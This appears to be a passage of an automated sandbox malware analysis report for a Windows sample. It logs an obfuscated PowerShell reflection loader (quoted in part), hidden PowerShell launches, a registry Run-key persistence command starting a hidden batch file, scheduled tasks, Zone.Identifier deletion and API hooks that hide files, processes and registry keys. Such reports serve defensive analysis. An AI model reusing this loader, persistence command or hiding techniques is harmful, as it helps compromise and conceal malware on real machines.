Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Code function: 20_2_000001B444901E3C LoadLibraryA,GetProcAddress,SleepEx,

20_2_000001B444901E3C

Source: C:\Windows\System32\conhost.exe	Code function: 20_3_000001B4448BA7DD push rcx; retf 003Fh	20_3_000001B4448BA7DE
Source: C:\Windows\System32\conhost.exe	Code function: 39_3_000001FE3A95A7DD push rcx; retf 003Fh	39_3_000001FE3A95A7DE
Source: C:\Windows\System32\dllhost.exe	Code function: 40_3_000001C03F6FA7DD push rcx; retf 003Fh	40_3_000001C03F6FA7DE
Source: C:\Windows\System32\winlogon.exe	Code function: 41_3_000002E99173A7DD push rcx; retf 003Fh	41_3_000002E99173A7DE
Source: C:\Windows\System32\lsass.exe	Code function: 42_3_00000213BDCCA7DD push rcx; retf 003Fh	42_3_00000213BDCCA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 43_3_00000158709BA7DD push rcx; retf 003Fh	43_3_00000158709BA7DE
Source: C:\Windows\System32\dwm.exe	Code function: 44_3_0000026DB164A7DD push rcx; retf 003Fh	44_3_0000026DB164A7DE
Source: C:\Windows\System32\dwm.exe	Code function: 44_3_0000026DB161A7DD push rcx; retf 003Fh	44_3_0000026DB161A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 45_3_000002A3EFFDA7DD push rcx; retf 003Fh	45_3_000002A3EFFDA7DE

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Creates autostart registry keys with suspicious names

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\System32\Tasks\$rbx-1ktMxXBv

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
